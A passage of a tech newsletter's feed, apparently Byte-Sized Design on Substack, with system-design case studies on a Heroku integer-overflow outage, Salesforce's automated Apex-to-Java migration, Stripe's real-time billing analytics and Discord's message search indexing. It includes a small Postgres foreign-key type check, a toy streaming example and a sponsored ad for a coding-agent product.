pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>At scale, this meant:</p><ul><li><p><strong>1 trillion+ events per day</strong> flowing through event delivery</p></li><li><p><strong>38,000+ scheduled pipelines</strong> running hourly and daily</p></li><li><p><strong>1,800+ event types</strong> representing user interactions</p></li><li><p>Teams across payments, ML, experimentation, and product all needing reliable, fast 
access</p></li></ul><h2>&#127959;&#65039; Architecture That Actually Scales</h2><h3>The Three-Pillar Model</h3>
      <p>
          <a href="https://read.bytesizeddesign.com/p/the-trillion-event-platform-how-spotify">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[The 2.1 Billion Problem: How a Single Integer Broke Heroku's API]]></title><description><![CDATA[Inside the 4-Hour Heroku Outage: The Critical Lesson on Integer Overflow, Schema Drift, and the Hidden Danger of Database Statistics]]></description><link>https://read.bytesizeddesign.com/p/the-21-billion-problem-how-a-single</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/the-21-billion-problem-how-a-single</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Tue, 23 Dec 2025 07:08:39 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/a96c3e12-87c1-4bd0-9a6e-8b4edf0beec9_1000x500.webp" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>TL;DR</h2><p>Heroku&#8217;s API went dark for 4 hours because a foreign key used <code>int32</code> while its primary key was <code>int64</code>. When the counter hit 2.1 billion, everything broke. The engineers ran a migration to fix it, which worked but cleared Postgres&#8217;s query statistics and made everything <em>worse</em>. Running apps stayed up; everything else died.</p><div><hr></div><h2>What Went Down</h2><p>Somewhere in Heroku&#8217;s database, a primary key was happily incrementing as a <code>bigint</code>. A foreign key pointing to it was using a regular <code>int</code>. </p><p>This went unnoticed for years until the primary key exceeded 2.1 billion and the foreign key couldn&#8217;t keep up. Integer overflow. Auth system down. Customers locked out.</p><p>On-call engineers wrote a migration to upsize the foreign key to match. The migration ran successfully and new authorizations started working again. Crisis averted.</p><p>Except it wasn&#8217;t. Altering that column wiped Postgres&#8217;s internal statistics&#8212;the data the query optimizer uses to plan efficient queries. Without those stats, queries that normally took milliseconds started taking seconds. The partial outage became a complete API failure.</p><p>They put the API in read-only mode, fixed the statistics, monitored everything, and gradually brought the system back up. Total time down: just under 4 hours.</p><h2>Senior Engineer Takeaways</h2>
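<p>One practical check worth running before the takeaways; this is our sketch, not something from Heroku&#8217;s post-mortem. Ask the catalog for single-column foreign keys whose type differs from the column they reference, and if you do widen one, remember that the column rewrite leaves the planner without fresh statistics until you run <code>ANALYZE</code>.</p><pre><code># A sketch, not from Heroku's post-mortem: list single-column foreign keys
# whose type differs from the column they reference (e.g. int vs bigint).
import psycopg2

DSN = "postgresql://localhost/example"  # placeholder

MISMATCH_SQL = """
    SELECT con.conrelid::regclass         AS referencing_table,
           att.attname                    AS fk_column,
           format_type(att.atttypid, -1)  AS fk_type,
           con.confrelid::regclass        AS referenced_table,
           format_type(ratt.atttypid, -1) AS referenced_type
    FROM pg_constraint con
    JOIN pg_attribute att  ON att.attrelid = con.conrelid
                          AND att.attnum = con.conkey[1]
    JOIN pg_attribute ratt ON ratt.attrelid = con.confrelid
                          AND ratt.attnum = con.confkey[1]
    WHERE con.contype = 'f'
      AND array_length(con.conkey, 1) = 1
      AND att.atttypid != ratt.atttypid;
"""

with psycopg2.connect(DSN) as conn, conn.cursor() as cur:
    cur.execute(MISMATCH_SQL)
    for row in cur.fetchall():
        print(row)
    # If you widen a column with ALTER TABLE ... ALTER COLUMN ... TYPE bigint,
    # run ANALYZE on that table afterwards so the planner has fresh statistics.
</code></pre>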
      <p>
          <a href="https://read.bytesizeddesign.com/p/the-21-billion-problem-how-a-single">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[How Salesforce Migrated 7 Years of Legacy in 4 Months Instead of 2 Years]]></title><description><![CDATA[Build Apps with Parallel Coding Agents With One Prompt]]></description><link>https://read.bytesizeddesign.com/p/how-salesforce-migrated-7-years-of</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/how-salesforce-migrated-7-years-of</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Wed, 17 Dec 2025 17:20:46 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!4vTC!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9e340d2d-3de3-4e82-a859-e3456b256d58_951x511.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!4vTC!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9e340d2d-3de3-4e82-a859-e3456b256d58_951x511.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!4vTC!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9e340d2d-3de3-4e82-a859-e3456b256d58_951x511.png 424w, https://substackcdn.com/image/fetch/$s_!4vTC!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9e340d2d-3de3-4e82-a859-e3456b256d58_951x511.png 848w, https://substackcdn.com/image/fetch/$s_!4vTC!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9e340d2d-3de3-4e82-a859-e3456b256d58_951x511.png 1272w, https://substackcdn.com/image/fetch/$s_!4vTC!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9e340d2d-3de3-4e82-a859-e3456b256d58_951x511.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!4vTC!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9e340d2d-3de3-4e82-a859-e3456b256d58_951x511.png" width="951" height="511" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/9e340d2d-3de3-4e82-a859-e3456b256d58_951x511.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:511,&quot;width&quot;:951,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:752108,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://bytesizeddesign.substack.com/i/181762586?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9e340d2d-3de3-4e82-a859-e3456b256d58_951x511.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!4vTC!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9e340d2d-3de3-4e82-a859-e3456b256d58_951x511.png 424w, 
https://substackcdn.com/image/fetch/$s_!4vTC!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9e340d2d-3de3-4e82-a859-e3456b256d58_951x511.png 1456w" sizes="100vw" fetchpriority="high"></picture></div></a></figure></div><h2><strong>Build Apps with Parallel Coding Agents With One Prompt</strong></h2><p>Imagine shipping backend services, UI components, refactors, tests, and full features &#8212; all from a single prompt, without manually writing specs, breaking down tasks, or stitching AI outputs together.</p><p>That&#8217;s the power of <strong><a href="https://hubs.la/Q03XQj9K0">Zenflow</a> (by Zencoder)</strong>, a new way of building software with <strong>spec-driven AI workflows</strong> and <strong>parallel coding agents</strong>.</p><p>With Zenflow you get: <br><br><strong>&#129513; Spec-Driven Development (SDD)</strong></p><p>Agents plan, gather requirements and build specs, always being anchored to evolving specs instead of random chats. They follow the same discipline your best engineers use.</p><h3><strong>&#129309; Multi-Agent Verification</strong></h3><p>Agents cross-check each other&#8217;s work so <em>you</em> don&#8217;t have to. Drift and slop get caught before they ever reach you.</p><h3><strong>&#9889; Parallelization at Scale</strong></h3><p>One engineer. A fleet of agents. Workflows that turn weeks into hours.</p><h3>&#128421;&#65039; <strong>AI-First UX</strong></h3><p>Kanban, tasks, subtasks, inbox - finally a UI built for managing AI work at scale.</p><h3>&#128260; <strong>Auto-Generated Task Flows</strong></h3><p> We break work into steps automatically. Less AI babysitting. 
More shipping.</p><h3>&#127919; <strong>Model Diversity</strong></h3><p> Different AI models challenge each other&#8217;s assumptions and catch blind spots.<br> Better accuracy, fewer surprises</p><p><strong>Stop gambling with prompts. Start orchestrating.<br><br><a href="https://hubs.la/Q03XQj9K0">GET STARTED FOR FREE</a></strong></p><div><hr></div><p>Salesforce&#8217;s Own Archive ran fine as a third-party managed package. By 2024, enterprise customers demanded native platform integration because compliance teams won&#8217;t sign off on external packages managing core archival data.</p><p>The problem? Seven years of undocumented Apex with static methods everywhere. Thousands of tightly coupled files. Deep dependency chains that made file-by-file translation impossible. And multi-tenant Core infrastructure that would choke on single-tenant static designs.</p><p>The fix? Dependency graph analysis to identify migration order. Leaf-to-root refactoring that built stable foundations first. Automated transformation with human-validated architectural patterns. And service-layer redesign that turned static spaghetti into scalable Java without breaking production.</p><div><hr></div><h2><strong>&#128680; The Breaking Points</strong></h2><p><strong>Manual Migration Math Didn&#8217;t Work</strong></p><p>Initial estimates: 2 years. The team had 275 Apex classes, 3,537 total files, and zero documentation on what half of them did. Engineers would need to:</p><ul><li><p>Read every file to understand business logic</p></li><li><p>Manually rewrite Apex patterns into Java equivalents</p></li><li><p>Refactor static methods into multi-tenant service layers</p></li><li><p>Test each change against production behavior</p></li></ul><p>Even small migrations took months. Scale that to thousands of interdependent files? The calendar said 2027 before customers saw value.</p><p><strong>Dependency Hell Made Isolated Translation Impossible</strong></p><p>You can&#8217;t just convert <code>PaymentProcessor.apex</code> to <code>PaymentProcessor.java</code> and call it done. That file calls <code>UtilityHelpers</code>, which references <code>SharedConstants</code>, which imports <code>LegacyDataMapper</code>. Convert one in isolation and you get:</p><ul><li><p>Incomplete method signatures (where&#8217;s that utility method?)</p></li><li><p>Ambiguous return types (what does this constant actually mean?)</p></li><li><p>Code that compiles but behaves wrong at runtime</p></li></ul><p>Translation order mattered. The system didn&#8217;t have one.</p><p><strong>Static Methods Killed Multi-Tenancy</strong></p><p>The managed package loved static classes and global shared state. Worked great when Customer A&#8217;s instance ran separately from Customer B&#8217;s. Breaks catastrophically in Core&#8217;s shared infrastructure where 50 customers hit the same code simultaneously.</p><p>Direct syntax conversion would reproduce single-tenant assumptions. Memory leaks. Isolation violations. Performance collapse under load. The architecture needed fundamental redesign, not just language translation.</p><div><hr></div><h2><strong>&#128269; Root Causes</strong></h2><p><strong>1. Package-First Design Assumed Isolation</strong></p><p>Seven years of development optimized for standalone deployment. Every architectural decision&#8212;static methods, global state, tight coupling&#8212;made sense in that context. Moving to shared multi-tenant infrastructure meant those same decisions became liabilities.</p><p><strong>2. 
No Documentation, No Dependency Map</strong></p><p>Legacy code accumulates logic faster than teams document it. Files referenced each other through years of incremental changes. Nobody had a complete picture of what depended on what. Manual analysis would take months before migration even started.</p><p><strong>3. Manual Effort Doesn&#8217;t Scale to Thousands of Files</strong></p><p>Rewriting code file-by-file works for small projects. At scale, it&#8217;s a coordination nightmare. Engineers step on each other. Changes ripple unpredictably. Regression risk compounds. The process itself becomes the bottleneck.</p><div><hr></div><h2><strong>&#129504; The Solution Architecture</strong></h2><p><strong>1. Dependency Graph Analysis Revealed Migration Order</strong></p><p>First step: Generate a complete dependency graph of the entire codebase. Map every class relationship. Identify which files depend on which.</p><p>This revealed natural layers:</p><ul><li><p><strong>Leaf nodes</strong>: Constants, utilities, helpers&#8212;no dependencies</p></li><li><p><strong>Mid-level</strong>: Business logic that calls leaf nodes</p></li><li><p><strong>Root nodes</strong>: Workflows that orchestrate everything</p></li></ul><p>Migration order emerged automatically: Convert leaves first, then build upward.</p><p><strong>The Cold Start Problem</strong>: You still need to understand what each file does. Solution: Start with the simplest leaf nodes (constants, basic utilities) that have obvious behavior. Use those as reference implementations when converting more complex files up the chain.</p><p>Result: Stable foundation. Each layer referenced only verified code from below. No guesswork about what upstream dependencies should look like.</p><p><strong>2. Automated Transformation with Pattern-Based Rules</strong></p><p>Defined transformation rules that encoded Core&#8217;s architectural patterns:</p><ul><li><p>Convert static methods to service-layer classes</p></li><li><p>Replace global state with dependency injection</p></li><li><p>Separate concerns into clear object-oriented boundaries</p></li></ul><p>Engineers reviewed output at each layer, adjusting rules as deeper refactoring needs surfaced. Not &#8220;let the machine write code unsupervised&#8221;&#8212;but &#8220;automate the mechanical translation, validate the architectural decisions.&#8221;</p><p>Critical constraint: Every generated file must compile and pass basic linting before moving to the next layer. Cascading errors break the pipeline.</p><p><strong>3. Test Suite Redesign Instead of Direct Migration</strong></p><p>Directly migrating Apex unit tests would reproduce legacy assumptions. Instead:</p><ul><li><p>Extract logical intent from each test</p></li><li><p>Rewrite test suites in Java against new service boundaries</p></li><li><p>Validate behavior, not implementation details</p></li></ul><p>Example: Old test checked that <code>StaticProcessor.calculate()</code> returned 42. New test validates that the payment service produces correct amounts regardless of implementation approach.</p><p>Result: Tests that verify the system works, not that it works the same way.</p><p><strong>4. Layered Validation Beyond Automation</strong></p><p>Code generation got the team 80% there. 
The remaining 20% required:</p><ul><li><p>Manual end-to-end flow testing</p></li><li><p>Bug bash sessions with engineers outside the core team</p></li><li><p>Early deployment cycles that surfaced integration issues</p></li><li><p>Planned Selenium automation for UI regression coverage</p></li></ul><p>Early cycles found many issues. Later phases found only a few. The release stabilized through systematic validation, not hope.</p><div><hr></div><h2><strong>&#129520; The Cascade of Benefits</strong></h2><p><strong>Before</strong>: Manual file-by-file &#8594; 2 years &#8594; huge regression risk &#8594; blocked on engineer availability</p><p><strong>After</strong>: Dependency-driven automation &#8594; 4 months &#8594; layered validation &#8594; same team manages 2x the code</p><p>Unlocked outcomes:</p><ul><li><p>Native platform integration (compliance teams happy)</p></li><li><p>Unified deployment pipelines (security scanning built-in)</p></li><li><p>Consistent architectural patterns (easier to maintain)</p></li><li><p>Doubled codebase managed by same headcount (support both versions during transition)</p></li></ul><div><hr></div><h2><strong>&#129300; Lessons Learned</strong></h2><p><strong>1. Dependency Order Is Migration Strategy</strong></p><p>You can&#8217;t translate interdependent code in random order. Graph analysis is a must-have. Leaf-to-root migration prevents cascading errors and provides stable reference implementations at each layer.</p><p><strong>2. Automation Requires Architectural Constraints</strong></p><p>Pattern-based transformation only works when you define clear target patterns. &#8220;Convert this Apex to Java&#8221; is too vague. &#8220;Convert static methods to service classes with dependency injection following these specific conventions&#8221; gives automation something to execute.</p><p><strong>3. Tests Validate Intent, Not Implementation</strong></p><p>Migrating legacy tests 1:1 preserves old assumptions. Rewriting tests against new boundaries validates that the system solves the same problems, even if implementation differs. This catches architectural mismatches automation can&#8217;t see.</p><p><strong>4. Scale Changes What&#8217;s Possible</strong></p><p>Manual migration works for 10 files. Breaks at 100. Completely infeasible at 3,537. The volume itself forced process innovation&#8212;dependency graphs, automated transformation, layered validation. Sometimes constraints drive better solutions than greenfield freedom.</p><p><strong>5. Human Validation Remains Non-Negotiable</strong></p><p>Automated translation accelerated development. But functional correctness required systematic testing, manual review, and iterative refinement. Code that compiles isn&#8217;t code that works. 
Speed without validation just ships bugs faster.</p><div><hr></div><h2><strong>&#127959;&#65039; What Salesforce Built to Make This Work</strong></h2><ul><li><p>Dependency graph generator for entire managed package</p></li><li><p>Leaf-to-root migration pipeline based on reference direction</p></li><li><p>Pattern-based transformation rules for Apex-to-Java conversion</p></li><li><p>Service-layer architecture with dependency injection</p></li><li><p>Test suite redesign focused on behavioral validation</p></li><li><p>Multi-phase bug bash process with cross-team participation</p></li><li><p>Infrastructure to maintain 14,000 files (legacy + new) simultaneously</p></li></ul><div><hr></div><h2><strong>&#127937; Bottom Line</strong></h2><p>Salesforce didn&#8217;t migrate Own Archive because the old version was broken. They migrated because enterprise customers demand native platform integration, and compliance teams won&#8217;t approve external packages for core data flows.</p><p>For engineering leaders and architects:</p><p><strong>Map dependencies before migration starts.</strong> You can&#8217;t translate interdependent code in arbitrary order. Graph analysis reveals natural layers and eliminates guesswork.</p><p><strong>Automate mechanical translation, validate architectural decisions.</strong> Pattern-based rules scale to thousands of files. Human review ensures output matches target patterns. Don&#8217;t automate blindly&#8212;automate strategically.</p><p><strong>Redesign tests around new boundaries.</strong> Legacy test suites encode legacy assumptions. Rewrite for behavioral validation, not implementation preservation.</p><p><strong>Accept that scale breaks manual processes.</strong> 10 files? Manual works. 3,537 files? Manual is a 2-year disaster. Volume forces innovation.</p><p><strong>Validation is where correctness lives.</strong> Fast code generation means nothing if it ships broken behavior. Systematic testing, bug bashes, and iterative refinement are non-negotiable.</p><p><strong>Plan for dual-system maintenance.</strong> Migration isn&#8217;t flipping a switch. The team maintained both versions simultaneously, 14,000 files managed by the same engineers. Plan capacity accordingly.</p><p>Legacy migration isn&#8217;t about rewriting old code. It&#8217;s about extracting value from proven systems while aligning with modern architectural constraints. 
Salesforce built a process where &#8220;modern&#8221; arrived in 4 months, not 2 years.</p><div><hr></div><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://engineering.salesforce.com/how-ai-driven-refactoring-cut-a-2-year-legacy-code-migration-to-4-months/&quot;,&quot;text&quot;:&quot;Read More!&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://engineering.salesforce.com/how-ai-driven-refactoring-cut-a-2-year-legacy-code-migration-to-4-months/"><span>Read More!</span></a></p><p></p>]]></content:encoded></item><item><title><![CDATA[How Stripe built real-time billing analytics that actually works]]></title><description><![CDATA[TL;DR Stripe&#8217;s batch-based billing analytics worked fine when updates could wait 24 hours.]]></description><link>https://read.bytesizeddesign.com/p/how-stripe-built-real-time-billing</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/how-stripe-built-real-time-billing</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Tue, 09 Dec 2025 08:01:38 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!UMZA!,w_256,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06b64927-5de1-4edc-a245-b9b486e07503_1024x1024.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>TL;DR</h2><p>Stripe&#8217;s batch-based billing analytics worked fine when updates could wait 24 hours. By 2024, customers demanded real-time visibility into MRR, churn, and conversions because in fast-moving markets, yesterday&#8217;s data loses deals today.</p><p>The problem? Subscriptions are stateful nightmares. Every $20 payment needs context from months of history. Batch processing couldn&#8217;t scale to sub-hour latency. Preaggregated queries were fast but couldn&#8217;t incorporate live data. And letting customers change metric definitions meant reprocessing years of history without breaking real-time ingestion.</p><p>The fix? Event-driven streaming with Apache Flink. A brand-new Apache Pinot query engine that aggregates on-the-fly. And a dual-mode system that recalculates history while streaming live updates without the dashboard ever going dark.</p><h2>&#128680; The Breaking Points</h2><h3>Batch Processing Hit a Wall</h3><p>The old system recalculated subscription state by replaying <em>every event from the beginning of time</em>. Want to know if that June payment was on-time? Re-analyze January through June. For every subscription. Every 24 hours.</p><p>This worked until customers started asking: &#8220;Why can&#8217;t I see this trial conversion that just happened?&#8221; Because the batch job won&#8217;t run for another 18 hours, that&#8217;s why.</p><h3>Preaggregation Made Queries Fast But Data Stale</h3><p>Apache Pinot delivered sub-second dashboard queries by precomputing MRR over time in offline batch jobs. Fast responses, but baked-in staleness. Real-time streaming meant throwing out preaggregation&#8212;which meant risk of slow, unresponsive queries that would make the dashboard unusable.</p><h3>Custom Metric Definitions Created a Consistency Nightmare</h3><p>Customers could tweak MRR formulas (exclude coupons, adjust trial periods, etc.). Great for flexibility. Terrible for streaming systems. Change a definition? 
Now you need to:</p><ol><li><p>Reprocess 8 years of historical data (hours of computation)</p></li><li><p>Keep streaming new events using the <em>old</em> definition (can&#8217;t stop the world)</p></li><li><p>Somehow merge them without showing Frankenstein data in the dashboard</p></li></ol><p>There was no playbook for this.</p><h2>&#128269; Root Causes</h2><h3>1. Stateful Data Modeled with Stateless Batch Jobs</h3><p>Subscriptions have memory. Payments build on each other. But the analytics system pretended each batch was independent&#8212;forcing full history replays to reconstruct state.</p><h3>2. OLAP Optimization Assumed Offline Preparation</h3><p>Pinot&#8217;s speed came from precomputed aggregations. Remove that step for real-time data, and suddenly you&#8217;re doing complex windowed aggregations at query time&#8212;something the original engine couldn&#8217;t handle.</p><h3>3. No Strategy for Incremental Schema Evolution</h3><p>Metric definition changes were treated as &#8220;reindex everything from scratch&#8221; events. No concept of applying changes incrementally while preserving consistency.</p><h2>&#129504; The Solution Architecture</h2>
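<p>The core of the shift is easier to see in miniature. The toy below is not Stripe&#8217;s implementation; it only contrasts the two models described above: rebuilding subscription state by replaying the full event history on every run, versus carrying keyed running state forward (the way a Flink job would) and folding in just the new events.</p><pre><code># Not Stripe's implementation: a toy contrast between the two models above.

def mrr_by_replay(all_events):
    """Old model: rebuild subscription state from the full history, every run."""
    amounts = {}
    for e in all_events:                 # grows with years of history
        amounts[e["subscription_id"]] = 0 if e["type"] == "cancel" else e["amount"]
    return sum(amounts.values())

class MrrStream:
    """New model: keep keyed running state and fold in only new events."""
    def __init__(self):
        self.amounts = {}

    def apply(self, event):
        sid = event["subscription_id"]
        self.amounts[sid] = 0 if event["type"] == "cancel" else event["amount"]
        return sum(self.amounts.values())   # current MRR after this event
</code></pre><p>The streaming version never touches the backlog, which is what makes sub-hour latency plausible; it also shows why changing a metric definition hurts, because the running state was built under the old definition.</p>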
      <p>
          <a href="https://read.bytesizeddesign.com/p/how-stripe-built-real-time-billing">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[How Discord indexes Trillions of messages without falling apart]]></title><description><![CDATA[TL;DR Discord&#8217;s 2017 search architecture worked beautifully for billions of messages.]]></description><link>https://read.bytesizeddesign.com/p/how-discord-indexes-trillions-of</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/how-discord-indexes-trillions-of</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Thu, 04 Dec 2025 06:59:26 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!pS-M!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F373b4727-627d-4da8-aafa-f1c25e00427c_1600x900.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>TL;DR</strong></p><p>Discord&#8217;s 2017 search architecture worked beautifully for billions of messages. By 2025, under the weight of trillions, it collapsed. Redis queues dropped messages. Single node failures cascaded into 40% of bulk operations failing. 200+ node clusters became unmanageable. Guilds hit Lucene&#8217;s 2 billion message hard limit with no escape.</p><p>The fix? Rethink everything. Smaller clusters grouped into &#8220;cells.&#8221; Smarter message batching by destination. Kubernetes for orchestration. PubSub for guaranteed delivery. And a migration system that could reindex billions of messages without downtime.</p><div><hr></div><h2>&#128680; The Breaking Points</h2><p><strong>Redis Queues Couldn&#8217;t Handle Backpressure</strong></p><p>When Elasticsearch nodes failed (which happened often), the indexing queue backed up. Redis CPU maxed out. Messages got dropped. Search became incomplete.</p><p><strong>Bulk Indexing Was a House of Cards</strong></p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!pS-M!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F373b4727-627d-4da8-aafa-f1c25e00427c_1600x900.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!pS-M!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F373b4727-627d-4da8-aafa-f1c25e00427c_1600x900.png 424w, https://substackcdn.com/image/fetch/$s_!pS-M!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F373b4727-627d-4da8-aafa-f1c25e00427c_1600x900.png 848w, https://substackcdn.com/image/fetch/$s_!pS-M!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F373b4727-627d-4da8-aafa-f1c25e00427c_1600x900.png 1272w, https://substackcdn.com/image/fetch/$s_!pS-M!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F373b4727-627d-4da8-aafa-f1c25e00427c_1600x900.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!pS-M!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F373b4727-627d-4da8-aafa-f1c25e00427c_1600x900.png" width="1456" height="819" 
data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/373b4727-627d-4da8-aafa-f1c25e00427c_1600x900.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:819,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:790196,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://bytesizeddesign.substack.com/i/180680259?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F373b4727-627d-4da8-aafa-f1c25e00427c_1600x900.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!pS-M!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F373b4727-627d-4da8-aafa-f1c25e00427c_1600x900.png 424w, https://substackcdn.com/image/fetch/$s_!pS-M!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F373b4727-627d-4da8-aafa-f1c25e00427c_1600x900.png 848w, https://substackcdn.com/image/fetch/$s_!pS-M!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F373b4727-627d-4da8-aafa-f1c25e00427c_1600x900.png 1272w, https://substackcdn.com/image/fetch/$s_!pS-M!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F373b4727-627d-4da8-aafa-f1c25e00427c_1600x900.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 